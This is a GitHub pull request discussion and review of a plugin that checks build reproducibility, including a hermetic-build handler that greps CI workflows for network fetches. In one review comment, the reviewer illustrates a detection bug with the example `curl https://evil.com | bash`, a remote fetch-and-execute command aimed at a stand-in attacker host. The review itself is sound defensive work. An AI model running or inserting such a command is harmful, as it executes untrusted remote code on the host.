feat: scientific reproducibility plugin #138
Conversation
mlieberman85
left a comment
PR Review: Scientific Reproducibility Plugin
Tested all 5 handlers against this repo. L1 controls (deps pinned, build env declared) and L2 hermetic build pass. L2 provenance and L3 bit-for-bit are correctly INCONCLUSIVE. The plugin structure follows established patterns.
Bug: Hermetic build handler has false negatives
`repro_hermetic_build_handler` checks for safe patterns at the file level, not per line. If any safe pattern (e.g. `uv sync`) appears anywhere in a workflow file, all suspicious patterns (`curl`, `apt-get install`) in that same file are silently ignored:

```python
is_safe = any(safe in content for safe in safe_patterns)
if pattern in content and not is_safe:
    violations.append(...)
```

A workflow containing both `uv sync` and `curl https://evil.com | bash` passes as "hermetic." The safe-pattern check needs to be per line or per step, not per file.
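A minimal per-line sketch of the fix (pattern lists abbreviated and names illustrative, not the handler's actual code): a safe pattern only excuses the line it appears on, so a hermetic `uv sync` elsewhere in the file cannot mask a `curl | bash` step.

```python
SUSPICIOUS = ["curl", "wget", "apt-get install"]
SAFE = ["uv sync", "uv pip install"]

def find_violations(content: str) -> list[tuple[int, str]]:
    """Return (line_number, pattern) pairs for suspicious lines."""
    violations = []
    for lineno, line in enumerate(content.splitlines(), start=1):
        if any(safe in line for safe in SAFE):
            # The safe pattern must appear on *this* line to excuse it.
            continue
        for pattern in SUSPICIOUS:
            if pattern in line:
                violations.append((lineno, pattern))
                break  # one violation per line is enough
    return violations
```

With this shape, `"run: uv sync\nrun: curl https://evil.com | bash"` yields a violation on line 2 instead of passing silently.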
Note: Hermetic build check is a starting point
The RE-02.01 handler greps CI YAML for obvious network fetch commands, which is a reasonable first pass but doesn't verify actual build isolation. It will miss network access from Makefiles, setup.py, or anything not invoked via the checked CLI tools, and will false-fail on legitimate post-build uses of curl/wget. True hermetic build enforcement likely requires an isolation mechanism — something like Witness for runtime attestation, or build systems with built-in sandboxing like Bazel (--sandbox_network=false) or Nix. Worth opening an issue to track evolving this control.
Bug: Same plugin.py indentation issue
Lines 114, 136, 151, 165 — identical to #136 and #137. All Marc-cn PRs share this.
Minor
- No tests in the diff (PR claims 28 tests). I wrote 44 (31 handler tests + 13 implementation tests), all pass.
- Remediation for RE-01.01 hardcodes `uv lock` — won't help non-Python projects
- Missing SARIF fields (acknowledged)
What's good
- Well-chosen controls that cover the reproducibility spectrum (L1 basic hygiene → L3 bit-for-bit)
- Handlers are filesystem-based with no subprocess calls — easy to test, no external tool dependencies
- Good evidence collection (lists all files checked and found)
- Conservative defaults — returns INCONCLUSIVE when signals are absent rather than guessing
Applied the same fixes from #136 and #137:
Regarding "Note: Hermetic build check is a starting point": should we open a GitHub issue to track it? Something like "RE-02.01 HermeticBuild: evolve beyond grep-based heuristic toward runtime attestation".
@Marc-cn let's create a tracking issue with how you see this going, so we can track where we're going with it, what you plan to support out of the gate, and what you plan to support long term.
mlieberman85
left a comment
Re-review: hermetic build fix is correct, structural questions remain
The per-line refactor of repro_hermetic_build_handler is right and the new regression test (test_pass_does_not_ignore_violations_when_safe_pattern_present) explicitly nails the bug class I flagged. Nice. Workspace registration looks correct; the package will actually be discoverable now.
Fixed since last review ✅
- Hermetic build per-line check (and a regression test that would have caught the original bug).
- `plugin.py` indentation — handled in the shared base path; not in this diff.
- Workspace registration — root `pyproject.toml` now lists `darnit-reproducibility` as a workspace dep.
- Tests added (14 handler tests + implementation tests).
Still outstanding ⚠️
Tracking issue for HermeticBuild evolution — I asked you to open one a while back so we can plan out what RE-02.01 supports out of the gate vs. long term (Witness / Bazel sandbox / Nix / etc.). I couldn't find one. Could you open it before merge? A short writeup of: (a) what the v0.1 grep heuristic catches and misses, (b) what "true" hermeticity verification would require, (c) which signals you'd want to add next (composite actions, Makefile, setup.py, runtime attestation). Link it from RE-02.01 in reproducibility.toml so the limitation is visible to anyone reading the control.
Structural questions — please clarify before merge
See inline comments. Short version:
- Two ways to expose handlers (`register_sieve_handlers()` + `get_check_handlers()`) — which does the framework actually consume? If both, why?
- Two framework-path entry points (`darnit.frameworks` → `get_framework_path()` and `darnit.implementations` → `impl.get_framework_config_path()`) returning the same path. Pick one.
- `[controls."RE-01.01".remediation]` exists in TOML but `get_remediation_registry()` returns `{}`. Does the framework auto-load TOML remediations, or is there a wiring gap?
None of these break correctness today, but the protocol surface for plugin authors is becoming muddled and worth tightening before another plugin lands.
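One way the handler-exposure question could resolve, sketched with hypothetical stub handlers (the two function names are from this PR; everything else is illustrative): keep the dict as the single source of truth and derive registration from it, so plugin authors maintain one list instead of two parallel ones.

```python
def get_check_handlers() -> dict:
    """Single canonical mapping of check IDs to handler callables."""
    return {
        # Stub handlers standing in for the real ones in handlers.py.
        "repro_deps_pinned": lambda ctx: "PASS",
        "repro_hermetic_build": lambda ctx: "INCONCLUSIVE",
    }

def register_sieve_handlers(registry: dict) -> None:
    """Thin wrapper: registration is derived from the canonical dict,
    so the two surfaces can never drift apart."""
    registry.update(get_check_handlers())
```

Under this shape, forgetting one surface becomes impossible; the registry-based path and the dict-based path always see the same handlers.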
Minor
- `pyproject.toml` and `reproducibility.toml` both lack trailing newlines (`\ No newline at end of file` in diff). Add them.
- `RE-01.01` remediation hardcodes `uv lock` — fine for v0.1 (and the `spec_version = "repro v0.1"` is honest about scope), but please add a TOML comment noting it's Python-only and a TODO for per-language detection. Otherwise users with `Cargo.toml` will get a confusing remediation suggestion.
- `get_controls_by_level` builds the full 5-control list on every call, then filters. Build once and cache, or just have `get_all_controls` iterate directly. Cosmetic.
- `spec_version = "repro v0.1"` — other implementations use a more URI-like spec_version string (`"https://baseline.openssf.org/versions/2025-10-10"`). Pick a stable identifier scheme now while there's only one version.
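The `get_controls_by_level` point can be sketched like this (control data abbreviated to two entries; the real fields come from `reproducibility.toml`):

```python
from functools import lru_cache

@lru_cache(maxsize=1)
def get_all_controls() -> tuple:
    """Build the control tuple once; later calls return the cached object."""
    return (
        {"id": "RE-01.01", "level": 1},
        {"id": "RE-02.01", "level": 2},
    )

def get_controls_by_level(level: int) -> list:
    """Filter the cached controls instead of rebuilding the list per call."""
    return [c for c in get_all_controls() if c["level"] == level]
```

A module-level constant would work equally well; `lru_cache` just keeps the lazy-build shape of the current code.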
What's good
- The five controls hit the right reproducibility ladder rungs (pinned deps → declared env → hermetic build → provenance → bit-for-bit), and each is appropriately conservative — INCONCLUSIVE when the signal isn't there, rather than false PASS.
- Handlers are pure-filesystem with no subprocess calls; trivially testable.
- Test coverage exercises both happy path and the specific regression case.
- Plugin structure (entry points, `register()`, `register_sieve_handlers`, framework TOML) follows the established pattern from `darnit-baseline` cleanly.
Verdict: Lift the tracking-issue ask + the three structural clarifications, and this is mergeable. Bug fix itself is approved.
```python
"repro_deps_pinned": handlers.repro_deps_pinned_handler,
"repro_build_env_declared": handlers.repro_build_env_declared_handler,
"repro_hermetic_build": handlers.repro_hermetic_build_handler,
"repro_provenance_exists": handlers.repro_provenance_exists_handler,
```
Two handler-exposure surfaces here — register_sieve_handlers() (called from __init__.py:register(), registers directly with the global registry) and get_check_handlers() (returns a dict). Which one does the framework actually consume?
If both: each plugin author now has to keep two parallel lists in sync, and forgetting one will silently break in different ways depending on which code path the framework hits. I'd push for one canonical surface and delete the other.
If the answer is "register_sieve_handlers is the real one, get_check_handlers is for some legacy/MCP-tool path," please drop a comment on get_check_handlers saying so.
```python
def get_framework_path() -> Path:
    """Entry point for framework TOML discovery."""
```
Two entry points pointing at the same TOML:
- `darnit.implementations` → `register()` → `impl.get_framework_config_path()` returns `reproducibility.toml`
- `darnit.frameworks` → `get_framework_path()` returns the same `reproducibility.toml`
Is the darnit.frameworks entry point still required by the loader, or is get_framework_config_path() on the implementation enough now? If both are required, OK — but please document why so future plugin authors don't have to reverse-engineer it. If only one is needed, drop the other.
```python
level=2,
domain="RE",
metadata={},
),
```
get_remediation_registry() returns {}, but reproducibility.toml defines a real remediation for RE-01.01:
```toml
[[controls."RE-01.01".remediation.handlers]]
handler = "exec"
command = ["uv", "lock"]
dry_run_command = ["uv", "lock", "--dry-run"]
```

Does the framework auto-load TOML-defined remediations and merge them with `get_remediation_registry()`? If yes, please confirm with a quick test that `darnit run --remediate` actually picks up the `uv lock` step. If no, this remediation is dead config and you'd need to expose it through the registry.
```
dry_run_command = ["uv", "lock", "--dry-run"]
# =============================================================================
# Control: Is the build environment declared?
```
uv lock is Python-specific and will produce a confusing suggestion on, e.g., a Rust or Go project that fails this control because they have no lock file. Two options:
- Detect language from `project.primary_language` (now stored by the loader change in #137) and gate the remediation on `python`.
- For v0.1, just add a TOML comment + `# TODO` noting this is Python-only and add a tracking issue for per-language remediation.
Either is fine; current state silently misleads non-Python users.
```python
)
break  # one violation per line is enough
except Exception:
    continue
```
The hermetic-build check only looks at .github/workflows/*.{yml,yaml} — but real builds frequently fetch deps from Makefile, setup.py, build.sh, composite-action action.yml, or Containerfile/Dockerfile. A workflow that just runs make build will look hermetic here even if the Makefile does curl ... | bash.
This isn't a blocker for v0.1 (it's a documented heuristic), but the limitation should be (a) noted in the docstring so reviewers understand the signal, and (b) captured in the tracking issue I asked for above so we have a roadmap for tightening it.
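A sketch of widening the scan set; the glob list is illustrative, not a claim about what the handler should finally cover:

```python
from pathlib import Path

# Build-adjacent files that commonly contain network fetches (illustrative).
SCAN_GLOBS = [
    ".github/workflows/*.yml",
    ".github/workflows/*.yaml",
    "Makefile",
    "setup.py",
    "**/action.yml",       # composite actions
    "Dockerfile",
    "Containerfile",
]

def files_to_scan(repo: Path) -> list[Path]:
    """Collect every build-adjacent file the hermetic check should read."""
    found: list[Path] = []
    for pattern in SCAN_GLOBS:
        found.extend(p for p in repo.glob(pattern) if p.is_file())
    return sorted(set(found))
```

The per-line violation scan above would then run over each collected file, not just workflow YAML.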
Summary
Adds a new compliance domain covering scientific reproducibility of software builds. It is separate from the OpenSSF baseline, which focuses on security; this domain covers whether a build can be independently reproduced.
Type of Change
Framework Changes Checklist
- Ran `uv run python scripts/validate_sync.py --verbose` and it passes
- Ran `uv run python scripts/generate_docs.py` and committed any doc changes

Control/TOML Changes Checklist
Testing
What was built
- L1 pinned dependencies: lockfiles such as `Cargo.lock`, `package-lock.json`, `go.sum`, etc.
- L1 declared build environment: `.devcontainer/`, `.python-version`, etc.
- L2 hermetic build: flags network fetches: `curl`, `wget`, raw `pip install`
- L2 provenance: `sigstore/cosign` or `slsa-github-generator`
- L3 bit-for-bit: reproducibility checks in CI and `reprotest` / `diffoscope` usage
Additional Notes